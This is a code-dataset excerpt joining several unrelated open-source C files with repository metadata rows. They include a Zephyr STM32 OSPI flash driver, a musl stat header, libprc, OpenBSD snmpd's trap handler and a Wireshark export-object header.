if (clock_control_on(DEVICE_DT_GET(STM32_CLOCK_CONTROL_NODE),
(clock_control_subsys_t) &dev_cfg->pclken) != 0) {
LOG_ERR("Could not enable OSPI clock");
return -EIO;
}
if (clock_control_get_rate(DEVICE_DT_GET(STM32_CLOCK_CONTROL_NODE),
(clock_control_subsys_t) &dev_cfg->pclken,
&ahb_clock_freq) < 0) {
LOG_ERR("Failed to get AHB clock frequency");
return -EIO;
}
for (; prescaler <= STM32_OSPI_CLOCK_PRESCALER_MAX; prescaler++) {
uint32_t clk = ahb_clock_freq / (prescaler + 1);
if (clk <= dev_cfg->max_frequency) {
break;
}
}
__ASSERT_NO_MSG(prescaler <= STM32_OSPI_CLOCK_PRESCALER_MAX);
/* Initialize OSPI HAL structure completely */
dev_data->hospi.Init.FifoThreshold = 4;
dev_data->hospi.Init.ClockPrescaler = prescaler;
dev_data->hospi.Init.DeviceSize = find_lsb_set(dev_cfg->flash_size);
dev_data->hospi.Init.DualQuad = HAL_OSPI_DUALQUAD_DISABLE;
dev_data->hospi.Init.ChipSelectHighTime = 2;
dev_data->hospi.Init.FreeRunningClock = HAL_OSPI_FREERUNCLK_DISABLE;
dev_data->hospi.Init.ClockMode = HAL_OSPI_CLOCK_MODE_0;
dev_data->hospi.Init.WrapSize = HAL_OSPI_WRAP_NOT_SUPPORTED;
dev_data->hospi.Init.SampleShifting = HAL_OSPI_SAMPLE_SHIFTING_NONE;
/* STR mode else Macronix for DTR mode */
if (dev_cfg->data_rate == OSPI_DTR_TRANSFER) {
dev_data->hospi.Init.MemoryType = HAL_OSPI_MEMTYPE_MACRONIX;
dev_data->hospi.Init.DelayHoldQuarterCycle = HAL_OSPI_DHQC_ENABLE;
} else {
dev_data->hospi.Init.MemoryType = HAL_OSPI_MEMTYPE_MICRON;
dev_data->hospi.Init.DelayHoldQuarterCycle = HAL_OSPI_DHQC_DISABLE;
}
dev_data->hospi.Init.ChipSelectBoundary = 0;
dev_data->hospi.Init.DelayBlockBypass = HAL_OSPI_DELAY_BLOCK_USED;
dev_data->hospi.Init.Refresh = 0;
if (HAL_OSPI_Init(&dev_data->hospi) != HAL_OK) {
LOG_ERR("OSPI Init failed");
return -EIO;
}
#if defined(CONFIG_SOC_SERIES_STM32U5X)
/* OCTOSPI I/O manager init Function */
OSPIM_CfgTypeDef ospi_mgr_cfg = {0};
__HAL_RCC_OSPIM_CLK_ENABLE();
if (dev_data->hospi.Instance == OCTOSPI1) {
ospi_mgr_cfg.ClkPort = 1;
ospi_mgr_cfg.DQSPort = 1;
ospi_mgr_cfg.NCSPort = 1;
ospi_mgr_cfg.IOLowPort = HAL_OSPIM_IOPORT_1_LOW;
ospi_mgr_cfg.IOHighPort = HAL_OSPIM_IOPORT_1_HIGH;
} else if (dev_data->hospi.Instance == OCTOSPI2) {
ospi_mgr_cfg.ClkPort = 2;
ospi_mgr_cfg.DQSPort = 2;
ospi_mgr_cfg.NCSPort = 2;
ospi_mgr_cfg.IOLowPort = HAL_OSPIM_IOPORT_2_LOW;
ospi_mgr_cfg.IOHighPort = HAL_OSPIM_IOPORT_2_HIGH;
}
ospi_mgr_cfg.Req2AckTime = 1;
if (HAL_OSPIM_Config(&dev_data->hospi, &ospi_mgr_cfg,
HAL_OSPI_TIMEOUT_DEFAULT_VALUE) != HAL_OK) {
LOG_ERR("OSPI M config failed");
return -EIO;
}
/* OCTOSPI2 delay block init Function */
HAL_OSPI_DLYB_CfgTypeDef ospi_delay_block_cfg = {0};
ospi_delay_block_cfg.Units = 56;
ospi_delay_block_cfg.PhaseSel = 2;
if (HAL_OSPI_DLYB_SetConfig(&dev_data->hospi, &ospi_delay_block_cfg) != HAL_OK) {
LOG_ERR("OSPI DelayBlock failed");
return -EIO;
}
#endif /* CONFIG_SOC_SERIES_STM32U5X */
/* Reset NOR flash memory : still with the SPI/STR config for the NOR */
if (stm32_ospi_mem_reset(dev) != 0) {
LOG_ERR("OSPI reset failed");
return -EIO;
}
/* Check if memory is ready in the SPI/STR mode */
if (stm32_ospi_mem_ready(&dev_data->hospi,
OSPI_SPI_MODE, OSPI_STR_TRANSFER) != 0) {
LOG_ERR("OSPI memory not ready");
return -EIO;
}
if (stm32_ospi_config_mem(dev) != 0) {
LOG_ERR("OSPI mode not config'd (%u rate %u)",
dev_cfg->data_mode, dev_cfg->data_rate);
return -EIO;
}
/* Send the instruction to read the SFDP */
const uint8_t decl_nph = 2;
union {
/* We only process BFP so use one parameter block */
uint8_t raw[JESD216_SFDP_SIZE(decl_nph)];
struct jesd216_sfdp_header sfdp;
} u;
const struct jesd216_sfdp_header *hp = &u.sfdp;
ret = ospi_read_sfdp(dev, 0, u.raw, sizeof(u.raw));
if (ret != 0) {
LOG_ERR("SFDP read failed: %d", ret);
return ret;
}
uint32_t magic = jesd216_sfdp_magic(hp);
if (magic != JESD216_SFDP_MAGIC) {
LOG_ERR("SFDP magic %08x invalid", magic);
return -EINVAL;
}
LOG_DBG("%s: SFDP v %u.%u AP %x with %u PH", dev->name,
hp->rev_major, hp->rev_minor, hp->access, 1 + hp->nph);
const struct jesd216_param_header *php = hp->phdr;
const struct jesd216_param_header *phpe = php +
MIN(decl_nph, 1 + hp->nph);
while (php != phpe) {
uint16_t id = jesd216_param_id(php);
LOG_DBG("PH%u: %04x rev %u.%u: %u DW @ %x",
(php - hp->phdr), id, php->rev_major, php->rev_minor,
php->len_dw, jesd216_param_addr(php));
if (id == JESD216_SFDP_PARAM_ID_BFP) {
union {
uint32_t dw[MIN(php->len_dw, 20)];
struct jesd216_bfp bfp;
} u;
const struct jesd216_bfp *bfp = &u.bfp;
ret = ospi_read_sfdp(dev, jesd216_param_addr(php),
(uint8_t *)u.dw, sizeof(u.dw));
if (ret == 0) {
ret = spi_nor_process_bfp(dev, php, bfp);
}
if (ret != 0) {
LOG_ERR("SFDP BFP failed: %d", ret);
break;
}
}
++php;
}
#if defined(CONFIG_FLASH_PAGE_LAYOUT)
ret = setup_pages_layout(dev);
if (ret != 0) {
LOG_ERR("layout setup failed: %d", ret);
return -ENODEV;
}
#endif /* CONFIG_FLASH_PAGE_LAYOUT */
/* Initialize semaphores */
k_sem_init(&dev_data->sem, 1, 1);
k_sem_init(&dev_data->sync, 0, 1);
/* Run IRQ init */
dev_cfg->irq_config(dev);
return 0;
}
#define OSPI_FLASH_MODULE(drv_id, flash_id) \
(DT_DRV_INST(drv_id), ospi_nor_flash_##flash_id)
static void flash_stm32_ospi_irq_config_func(const struct device *dev);
#define STM32_OSPI_NODE DT_INST_PARENT(0)
PINCTRL_DT_DEFINE(STM32_OSPI_NODE);
static const struct flash_stm32_ospi_config flash_stm32_ospi_cfg = {
.regs = (OCTOSPI_TypeDef *)DT_REG_ADDR(STM32_OSPI_NODE),
.pclken = {
.enr = DT_CLOCKS_CELL(STM32_OSPI_NODE, bits),
.bus = DT_CLOCKS_CELL(STM32_OSPI_NODE, bus)
},
.irq_config = flash_stm32_ospi_irq_config_func,
.flash_size = DT_INST_PROP(0, size) / 8U,
.max_frequency = DT_INST_PROP(0, ospi_max_frequency),
.data_mode = DT_INST_PROP(0, spi_bus_width), /* SPI or OPI */
.data_rate = DT_INST_PROP(0, data_rate), /* DTR or STR */
.pcfg = PINCTRL_DT_DEV_CONFIG_GET(STM32_OSPI_NODE),
#if STM32_OSPI_RESET_GPIO
.reset = GPIO_DT_SPEC_INST_GET(0, reset_gpios),
#endif /* STM32_OSPI_RESET_GPIO */
#if DT_NODE_HAS_PROP(DT_INST(0, st_stm32_ospi_nor), sfdp_bfp)
.sfdp_bfp = DT_INST_PROP(0, sfdp_bfp),
#endif /* sfdp_bfp */
};
static struct flash_stm32_ospi_data flash_stm32_ospi_dev_data = {
.hospi = {
.Instance = (OCTOSPI_TypeDef *)DT_REG_ADDR(STM32_OSPI_NODE),
.Init = {
.FifoThreshold = STM32_OSPI_FIFO_THRESHOLD,
.SampleShifting = HAL_OSPI_SAMPLE_SHIFTING_NONE,
.ChipSelectHighTime = 1,
.ClockMode = HAL_OSPI_CLOCK_MODE_0,
},
},
};
DEVICE_DT_INST_DEFINE(0, &flash_stm32_ospi_init, NULL,
&flash_stm32_ospi_dev_data, &flash_stm32_ospi_cfg,
POST_KERNEL, CONFIG_KERNEL_INIT_PRIORITY_DEVICE,
&flash_stm32_ospi_driver_api);
static void flash_stm32_ospi_irq_config_func(const struct device *dev)
{
IRQ_CONNECT(DT_IRQN(STM32_OSPI_NODE), DT_IRQ(STM32_OSPI_NODE, priority),
flash_stm32_ospi_isr, DEVICE_DT_INST_GET(0), 0);
irq_enable(DT_IRQN(STM32_OSPI_NODE));
}
| 29.516798 | 97 | 0.726643 |
11ea9bf48907420935b6fc6cf568bf242a45d7a2 | 940 | h | C | runtime/musl-lkl/musl-target/arch/riscv64/bits/stat.h | dme26/intravisor | 9bf9c50aa14616bd9bd66eee47623e8b61514058 | [
"MIT"
] | 11 | 2022-02-05T12:12:43.000Z | 2022-03-08T08:09:08.000Z | runtime/musl-lkl/musl-target/arch/riscv64/bits/stat.h | dme26/intravisor | 9bf9c50aa14616bd9bd66eee47623e8b61514058 | [
"MIT"
] | null | null | null | runtime/musl-lkl/musl-target/arch/riscv64/bits/stat.h | dme26/intravisor | 9bf9c50aa14616bd9bd66eee47623e8b61514058 | [
"MIT"
] | 1 | 2022-02-22T20:32:22.000Z | 2022-02-22T20:32:22.000Z | #if 1
struct stat {
unsigned long st_dev;
unsigned long st_ino;
unsigned long st_nlink;
unsigned int st_mode;
unsigned int st_uid;
unsigned int st_gid;
unsigned int __pad0;
unsigned long st_rdev;
unsigned long st_size;
long st_blksize;
long st_blocks;
struct timespec st_atim;
struct timespec st_mtim;
struct timespec st_ctim;
unsigned __unused[2];
};
#else
struct stat {
unsigned long st_dev;
unsigned long st_ino;
unsigned int st_mode;
unsigned int st_nlink;
unsigned int st_uid;
unsigned int st_gid;
unsigned long st_rdev;
unsigned long __pad0;
unsigned long st_size;
int st_blksize;
unsigned int __pad1;
long st_blocks;
struct timespec st_atim;
struct timespec st_mtim;
struct timespec st_ctim;
unsigned __unused[2];
};
#endif
| 20 | 32 | 0.625532 |
670f6ec988480f0857496aa73403630484be065d | 2,121 | c | C | prc/fwhead.c | cfoust/palm-message-extraction | 91d98e883f98e6e9b71febedb7136348b2be216c | [
"MIT"
] | null | null | null | prc/fwhead.c | cfoust/palm-message-extraction | 91d98e883f98e6e9b71febedb7136348b2be216c | [
"MIT"
] | null | null | null | prc/fwhead.c | cfoust/palm-message-extraction | 91d98e883f98e6e9b71febedb7136348b2be216c | [
"MIT"
] | null | null | null | /* -*- Mode: C; tab-width: 4; indent-tabs-mode: nil; c-basic-offset: 4 -*-
*
* The contents of this file are subject to the Mozilla Public
* License Version 1.1 (the "License"); you may not use this file
* except in compliance with the License. You may obtain a copy of
* the License at http://www.mozilla.org/MPL/
*
* Software distributed under the License is distributed on an "AS
* IS" basis, WITHOUT WARRANTY OF ANY KIND, either express or
* implied. See the License for the specific language governing
* rights and limitations under the License.
*
* The Original Code is par & libprc, released May 13, 1999.
*
* The Initial Developer of the Original Code is David Williams,
* http://www.djw.org. Portions created by David Williams are
* Copyright (C) 1999 David Williams. All Rights Reserved.
* Contributor(s):
*/
/*
* fwhead.c
*
* created: djw@djw.org, January 2, 1999.
*/
#include "prcp.h"
int
prcfwriteheader(FILE* fp, prc_t* prc)
{
prc_file_t fbuf;
prc_uint32_t appInfoOffset = 0;
prc_uint32_t sortInfoOffset = 0;
if (prc->appinfoData != NULL) {
appInfoOffset = sizeof(prc_file_t) +
(sizeof(prc_file_record_header_t) * prc->nrecords) +
2;
}
if (prc->sortinfoData != NULL) {
sortInfoOffset = sizeof(prc_file_t) + appInfoOffset +
(sizeof(prc_file_record_header_t) * prc->nrecords) +
2;
}
memset(&fbuf, 0, sizeof(prc_file_t));
strncpy(&fbuf.name[0], prc->name, 32);
prcuint16tobuf(&fbuf.flags, prc->flags);
prcuint16tobuf(&fbuf.version, prc->version);
prcuint32tobuf(&fbuf.ctime, prc->ctime);
prcuint32tobuf(&fbuf.mtime, prc->mtime);
prcuint32tobuf(&fbuf.btime, prc->btime);
prcuint32tobuf(&fbuf.modnum, prc->modnum);
prcuint32tobuf(&fbuf.cid, prc->cid);
prcuint32tobuf(&fbuf.type, prc->type);
prcuint16tobuf(&fbuf.nrecords, prc->nrecords);
prcuint32tobuf(&fbuf.appinfo, appInfoOffset);
prcuint32tobuf(&fbuf.sortinfo, sortInfoOffset);
if (fwrite(&fbuf, sizeof(prc_file_t), 1, fp) != 1)
return -1;
return 0;
}
| 31.656716 | 74 | 0.663366 |
7b3f42da127e31616b24ffd7e1fa32101a9ce044 | 10,752 | c | C | usr.sbin/snmpd/traphandler.c | ArrogantWombatics/openbsd-src | 75721e1d44322953075b7c4b89337b163a395291 | [
"BSD-3-Clause"
] | 1 | 2019-02-16T13:29:23.000Z | 2019-02-16T13:29:23.000Z | usr.sbin/snmpd/traphandler.c | ArrogantWombatics/openbsd-src | 75721e1d44322953075b7c4b89337b163a395291 | [
"BSD-3-Clause"
] | 1 | 2018-08-21T03:56:33.000Z | 2018-08-21T03:56:33.000Z | usr.sbin/snmpd/traphandler.c | ArrogantWombatics/openbsd-src | 75721e1d44322953075b7c4b89337b163a395291 | [
"BSD-3-Clause"
] | null | null | null | /* $OpenBSD: traphandler.c,v 1.4 2015/12/07 12:33:08 reyk Exp $ */
/*
* Copyright (c) 2014 Bret Stephen Lambert <blambert@openbsd.org>
*
* Permission to use, copy, modify, and distribute this software for any
* purpose with or without fee is hereby granted, provided that the above
* copyright notice and this permission notice appear in all copies.
*
* THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
* WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
* MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
* ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
* WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
* ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
* OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
*/
#include <sys/queue.h>
#include <sys/param.h> /* nitems */
#include <sys/socket.h>
#include <sys/socketvar.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/uio.h>
#include <sys/wait.h>
#include <net/if.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <event.h>
#include <fcntl.h>
#include <imsg.h>
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <syslog.h>
#include <unistd.h>
#include <pwd.h>
#include "ber.h"
#include "snmpd.h"
#include "mib.h"
int trapsock;
struct event trapev;
char trap_path[PATH_MAX];
void traphandler_init(struct privsep *, struct privsep_proc *, void *arg);
int traphandler_dispatch_parent(int, struct privsep_proc *, struct imsg *);
int traphandler_bind(struct address *);
void traphandler_recvmsg(int, short, void *);
int traphandler_priv_recvmsg(struct privsep_proc *, struct imsg *);
int traphandler_fork_handler(struct privsep_proc *, struct imsg *);
int traphandler_parse(char *, size_t, struct ber_element **,
struct ber_element **, u_int *, struct ber_oid *);
void traphandler_v1translate(struct ber_oid *, u_int, u_int);
int trapcmd_cmp(struct trapcmd *, struct trapcmd *);
void trapcmd_exec(struct trapcmd *, struct sockaddr *,
struct ber_element *, char *, u_int);
char *traphandler_hostname(struct sockaddr *, int);
RB_PROTOTYPE(trapcmd_tree, trapcmd, cmd_entry, trapcmd_cmp)
RB_GENERATE(trapcmd_tree, trapcmd, cmd_entry, trapcmd_cmp)
struct trapcmd_tree trapcmd_tree = RB_INITIALIZER(&trapcmd_tree);
static struct privsep_proc procs[] = {
{ "parent", PROC_PARENT, traphandler_dispatch_parent }
};
pid_t
traphandler(struct privsep *ps, struct privsep_proc *p)
{
struct snmpd *env = ps->ps_env;
if (env->sc_traphandler &&
(trapsock = traphandler_bind(&env->sc_address)) == -1)
fatal("could not create trap listener socket");
return (proc_run(ps, p, procs, nitems(procs), traphandler_init,
NULL));
}
void
traphandler_init(struct privsep *ps, struct privsep_proc *p, void *arg)
{
struct snmpd *env = ps->ps_env;
if (!env->sc_traphandler)
return;
/* listen for SNMP trap messages */
event_set(&trapev, trapsock, EV_READ|EV_PERSIST, traphandler_recvmsg,
ps);
event_add(&trapev, NULL);
}
int
traphandler_bind(struct address *addr)
{
int s;
if ((s = snmpd_socket_af(&addr->ss, htons(SNMPD_TRAPPORT))) == -1)
return (-1);
if (fcntl(s, F_SETFL, O_NONBLOCK) == -1)
goto bad;
if (bind(s, (struct sockaddr *)&addr->ss, addr->ss.ss_len) == -1)
goto bad;
return (s);
bad:
close (s);
return (-1);
}
void
traphandler_shutdown(void)
{
event_del(&trapev);
close(trapsock);
}
int
traphandler_dispatch_parent(int fd, struct privsep_proc *p, struct imsg *imsg)
{
switch (imsg->hdr.type) {
default:
break;
}
return (-1);
}
int
snmpd_dispatch_traphandler(int fd, struct privsep_proc *p, struct imsg *imsg)
{
switch (imsg->hdr.type) {
case IMSG_ALERT:
return (traphandler_priv_recvmsg(p, imsg));
default:
break;
}
return (-1);
}
void
traphandler_recvmsg(int fd, short events, void *arg)
{
struct privsep *ps = arg;
char buf[8196];
struct iovec iov[2];
struct sockaddr_storage ss;
socklen_t slen;
ssize_t n;
struct ber_element *req, *iter;
struct ber_oid trapoid;
u_int uptime;
slen = sizeof(ss);
if ((n = recvfrom(fd, buf, sizeof(buf), 0, (struct sockaddr *)&ss,
&slen)) == -1)
return;
if (traphandler_parse(buf, n, &req, &iter, &uptime, &trapoid) == -1)
goto done;
iov[0].iov_base = &ss;
iov[0].iov_len = ss.ss_len;
iov[1].iov_base = buf;
iov[1].iov_len = n;
/* Forward it to the parent process */
if (proc_composev(ps, PROC_PARENT, IMSG_ALERT, iov, 2) == -1)
goto done;
done:
if (req != NULL)
ber_free_elements(req);
return;
}
/*
* Validate received message
*/
int
traphandler_parse(char *buf, size_t n, struct ber_element **req,
struct ber_element **vbinds, u_int *uptime, struct ber_oid *trapoid)
{
struct ber ber;
struct ber_element *elm;
u_int vers, gtype, etype;
bzero(&ber, sizeof(ber));
ber.fd = -1;
ber_set_application(&ber, smi_application);
ber_set_readbuf(&ber, buf, n);
if ((*req = ber_read_elements(&ber, NULL)) == NULL)
goto done;
if (ber_scanf_elements(*req, "{dSe", &vers, &elm) == -1)
goto done;
switch (vers) {
case SNMP_V1:
if (ber_scanf_elements(elm, "{oSddd",
trapoid, >ype, &etype, uptime) == -1)
goto done;
traphandler_v1translate(trapoid, gtype, etype);
break;
case SNMP_V2:
if (ber_scanf_elements(elm, "{SSSS{e}}", &elm) == -1 ||
ber_scanf_elements(elm, "{SdS}{So}e",
uptime, trapoid, vbinds) == -1)
goto done;
break;
default:
log_warnx("unsupported SNMP trap version '%d'", vers);
goto done;
}
ber_free(&ber);
return (0);
done:
ber_free(&ber);
if (*req)
ber_free_elements(*req);
*req = NULL;
return (-1);
}
void
traphandler_v1translate(struct ber_oid *oid, u_int gtype, u_int etype)
{
/* append 'specific trap' number to 'enterprise specific' traps */
if (gtype >= 6) {
oid->bo_id[oid->bo_n] = 0;
oid->bo_id[oid->bo_n + 1] = etype;
oid->bo_n += 2;
}
}
int
traphandler_priv_recvmsg(struct privsep_proc *p, struct imsg *imsg)
{
ssize_t n;
pid_t pid;
if ((n = IMSG_DATA_SIZE(imsg)) <= 0)
return (-1); /* XXX */
switch ((pid = fork())) {
case 0:
traphandler_fork_handler(p, imsg);
/* NOTREACHED */
case -1:
log_warn("%s: couldn't fork traphandler", __func__);
return (0);
default:
log_debug("forked process %i to handle trap", pid);
return (0);
}
/* NOTREACHED */
}
int
traphandler_fork_handler(struct privsep_proc *p, struct imsg *imsg)
{
char oidbuf[SNMP_MAX_OID_STRLEN];
struct sockaddr *sa;
char *buf;
ssize_t n;
struct ber_element *req, *iter;
struct trapcmd *cmd;
struct ber_oid trapoid;
u_int uptime;
struct passwd *pw;
extern int debug;
pw = p->p_ps->ps_pw;
if (setgroups(1, &pw->pw_gid) ||
setresgid(pw->pw_gid, pw->pw_gid, pw->pw_gid) ||
setresuid(pw->pw_uid, pw->pw_uid, pw->pw_uid))
fatal("traphandler_fork_handler: cannot drop privileges");
closefrom(STDERR_FILENO + 1);
log_init(debug, LOG_DAEMON);
log_procinit(p->p_title);
n = IMSG_DATA_SIZE(imsg);
sa = imsg->data;
n -= sa->sa_len;
buf = (char *)imsg->data + sa->sa_len;
if (traphandler_parse(buf, n, &req, &iter, &uptime, &trapoid) == -1)
fatalx("couldn't parse SNMP trap message");
smi_oid2string(&trapoid, oidbuf, sizeof(oidbuf), 0);
if ((cmd = trapcmd_lookup(&trapoid)) != NULL)
trapcmd_exec(cmd, sa, iter, oidbuf, uptime);
if (req != NULL)
ber_free_elements(req);
exit(0);
}
void
trapcmd_exec(struct trapcmd *cmd, struct sockaddr *sa,
struct ber_element *iter, char *trapoid, u_int uptime)
{
char oidbuf[SNMP_MAX_OID_STRLEN];
struct ber_oid oid;
struct ber_element *elm;
int n, s[2], status = 0;
char *value, *host;
pid_t child = -1;
if (socketpair(AF_UNIX, SOCK_STREAM, PF_UNSPEC, s) == -1) {
log_warn("could not create pipe for OID '%s'",
smi_oid2string(cmd->cmd_oid, oidbuf, sizeof(oidbuf), 0));
return;
}
switch (child = fork()) {
case 0:
dup2(s[1], STDIN_FILENO);
close(s[0]);
close(s[1]);
closefrom(STDERR_FILENO + 1);
/* path to command is in argv[0], args follow */
execve(cmd->cmd_argv[0], cmd->cmd_argv, NULL);
/* this shouldn't happen */
log_warn("could not exec trap command for OID '%s'",
smi_oid2string(cmd->cmd_oid, oidbuf, sizeof(oidbuf), 0));
_exit(1);
/* NOTREACHED */
case -1:
log_warn("could not fork trap command for OID '%s'",
smi_oid2string(cmd->cmd_oid, oidbuf, sizeof(oidbuf), 0));
close(s[0]);
close(s[1]);
return;
}
close(s[1]);
host = traphandler_hostname(sa, 0);
if (dprintf(s[0], "%s\n", host) == -1)
goto out;
host = traphandler_hostname(sa, 1);
if (dprintf(s[0], "%s\n", host) == -1)
goto out;
if (dprintf(s[0],
"iso.org.dod.internet.mgmt.mib-2.system.sysUpTime.0 %u\n",
uptime) == -1)
goto out;
if (dprintf(s[0],
"iso.org.dod.internet.snmpV2.snmpModules.snmpMIB.snmpMIBObjects."
"snmpTrap.snmpTrapOID.0 %s\n", trapoid) == -1)
goto out;
for (; iter != NULL; iter = iter->be_next) {
if (ber_scanf_elements(iter, "{oe}", &oid, &elm) == -1)
goto out;
if ((value = smi_print_element(elm)) == NULL)
goto out;
smi_oid2string(&oid, oidbuf, sizeof(oidbuf), 0);
n = dprintf(s[0], "%s %s\n", oidbuf, value);
free(value);
if (n == -1)
goto out;
}
out:
close(s[0]);
waitpid(child, &status, 0);
if (WIFSIGNALED(status)) {
log_warnx("child %i exited due to receipt of signal %i",
child, WTERMSIG(status));
} else if (WEXITSTATUS(status) != 0) {
log_warnx("child %i exited with status %i",
child, WEXITSTATUS(status));
} else {
log_debug("child %i finished", child);
}
close(s[1]);
return;
}
char *
traphandler_hostname(struct sockaddr *sa, int numeric)
{
static char buf[NI_MAXHOST];
int flag = 0;
if (numeric)
flag = NI_NUMERICHOST;
bzero(buf, sizeof(buf));
if (getnameinfo(sa, sa->sa_len, buf, sizeof(buf), NULL, 0, flag) != 0)
return ("Unknown");
return (buf);
}
struct trapcmd *
trapcmd_lookup(struct ber_oid *oid)
{
struct trapcmd key, *res;
bzero(&key, sizeof(key));
key.cmd_oid = oid;
if ((res = RB_FIND(trapcmd_tree, &trapcmd_tree, &key)) == NULL)
res = key.cmd_maybe;
return (res);
}
int
trapcmd_cmp(struct trapcmd *cmd1, struct trapcmd *cmd2)
{
int ret;
ret = ber_oid_cmp(cmd2->cmd_oid, cmd1->cmd_oid);
switch (ret) {
case 2:
/* cmd1 is a child of cmd2 */
cmd1->cmd_maybe = cmd2;
return (1);
default:
return (ret);
}
/* NOTREACHED */
}
int
trapcmd_add(struct trapcmd *cmd)
{
return (RB_INSERT(trapcmd_tree, &trapcmd_tree, cmd) != NULL);
}
void
trapcmd_free(struct trapcmd *cmd)
{
RB_REMOVE(trapcmd_tree, &trapcmd_tree, cmd);
free(cmd->cmd_argv);
free(cmd->cmd_oid);
free(cmd);
}
| 22.683544 | 78 | 0.671131 |
1bd6290a1ae9b771fd08ebf48d1b716cb40d678c | 146 | h | C | msg.h | MrBad/chat | ccf2a652a4ed522b1236adb51145ff05ad44925b | [
"MIT"
] | null | null | null | msg.h | MrBad/chat | ccf2a652a4ed522b1236adb51145ff05ad44925b | [
"MIT"
] | null | null | null | msg.h | MrBad/chat | ccf2a652a4ed522b1236adb51145ff05ad44925b | [
"MIT"
] | null | null | null | #ifndef _MSG_H
#define _MSG_H
enum {
NOT_USED,
SRV_MSG,
CHANGE_NICK,
NICK_CHANGED,
NICK_INUSE,
BCAST_MSG,
PRIV_MSG,
} msg_type_t;
#endif
| 9.733333 | 14 | 0.739726 |
400ff77e9d45ef4aaa4e870e37b3ff6ccd222851 | 371 | h | C | plugin/tpc-c/include/tpcc.h | kmikmy/p-wal | 6f3acb9b0333cd6114fd3015de34d7019bc06e14 | [
"Apache-2.0"
] | 4 | 2015-11-12T15:59:58.000Z | 2019-04-19T02:37:02.000Z | plugin/tpc-c/include/tpcc.h | kmikmy/p-wal | 6f3acb9b0333cd6114fd3015de34d7019bc06e14 | [
"Apache-2.0"
] | null | null | null | plugin/tpc-c/include/tpcc.h | kmikmy/p-wal | 6f3acb9b0333cd6114fd3015de34d7019bc06e14 | [
"Apache-2.0"
] | null | null | null | /*
* テーブルの定義はcreate_tableとload_tableに使われている。
* new-order.cppではtpcc_table.hを参照しているのでテーブルの定義は使われていないが、
* スケールファクターはここで定義しているので読み込む必要がある。
*/
#ifndef _tpc
#define _tpc
#include "tpcc_util.h"
//#include "tpcc_table.h"
#include "tpcc_page.h"
#include "workload.h"
#include "debug.h"
extern int W;
/* #ifndef W */
/* #define W 1 // Scale Factor */
/* #endif */
#endif
| 15.458333 | 56 | 0.71159 |
401255d33c1932cba53c01c6c3bc02c863e9f466 | 204 | c | C | src/common/ptrs/absolutePtr.c | AngheloAlf/GenIAlgos | 8354895a0a085e71a87ff27ec32317882d98e89b | [
"MIT"
] | null | null | null | src/common/ptrs/absolutePtr.c | AngheloAlf/GenIAlgos | 8354895a0a085e71a87ff27ec32317882d98e89b | [
"MIT"
] | null | null | null | src/common/ptrs/absolutePtr.c | AngheloAlf/GenIAlgos | 8354895a0a085e71a87ff27ec32317882d98e89b | [
"MIT"
] | null | null | null | #include "ptrs.h"
uint32_t absolutePtr(uint8_t bank, uint16_t relative_ptr){
if(relative_ptr < BANK_SIZE){
return relative_ptr;
}
--bank;
return bank*BANK_SIZE + relative_ptr;
}
| 18.545455 | 58 | 0.676471 |
72e053571b3528d0b337c0b4c43759895a1972f0 | 5,409 | h | C | resources/Wireshark/WiresharkDissectorFoo/epan/export_object.h | joshis1/C_Programming | 4a8003321251448a167bfca0b595c5eeab88608d | [
"MIT"
] | 2 | 2020-09-11T05:51:42.000Z | 2020-12-31T11:42:02.000Z | resources/Wireshark/WiresharkDissectorFoo/epan/export_object.h | joshis1/C_Programming | 4a8003321251448a167bfca0b595c5eeab88608d | [
"MIT"
] | null | null | null | resources/Wireshark/WiresharkDissectorFoo/epan/export_object.h | joshis1/C_Programming | 4a8003321251448a167bfca0b595c5eeab88608d | [
"MIT"
] | null | null | null | /* export_object.h
* GUI independent helper routines common to all export object taps.
*
* Wireshark - Network traffic analyzer
* By Gerald Combs <gerald@wireshark.org>
* Copyright 1998 Gerald Combs
*
* SPDX-License-Identifier: GPL-2.0-or-later
*/
#ifndef __EXPORT_OBJECT_H__
#define __EXPORT_OBJECT_H__
#include "tap.h"
#include "wmem/wmem.h"
#ifdef __cplusplus
extern "C" {
#endif /* __cplusplus */
typedef struct _export_object_entry_t {
guint32 pkt_num;
gchar *hostname;
gchar *content_type;
gchar *filename;
/* We need to store a 64 bit integer to hold a file length
(was guint payload_len;)
XXX - we store the entire object in the program's address space,
so the *real* maximum object size is size_t; if we were to export
objects by going through all of the packets containing data from
the object, one packet at a time, and write the object incrementally,
we could support objects that don't fit into the address space. */
gint64 payload_len;
guint8 *payload_data;
} export_object_entry_t;
/** Maximum file name size for the file to which we save an object.
This is the file name size, not the path name size; we impose
the limit so that the file doesn't have a ridiculously long
name, e.g. an HTTP object where the URL has a long query part. */
#define EXPORT_OBJECT_MAXFILELEN 255
typedef void (*export_object_object_list_add_entry_cb)(void* gui_data, struct _export_object_entry_t *entry);
typedef export_object_entry_t* (*export_object_object_list_get_entry_cb)(void* gui_data, int row);
typedef struct _export_object_list_t {
export_object_object_list_add_entry_cb add_entry; //GUI specific handler for adding an object entry
export_object_object_list_get_entry_cb get_entry; //GUI specific handler for retrieving an object entry
void* gui_data; //GUI specific data (for UI representation)
} export_object_list_t;
/** Structure for information about a registered exported object */
typedef struct register_eo register_eo_t;
/* When a protocol needs intermediate data structures to construct the
export objects, then it must specify a function that cleans up all
those data structures. This function is passed to export_object_window
and called when tap reset or windows closes occurs. If no function is needed
a NULL value should be passed instead */
typedef void (*export_object_gui_reset_cb)(void);
/** Register the export object handler for the Export Object windows.
*
* @param proto_id is the protocol with objects to export
* @param export_packet_func the tap processing function
* @param reset_cb handles clearing intermediate data structures constructed
* for exporting objects. If no function is needed a NULL value should be passed instead
* @return Tap id registered for the Export Object
*/
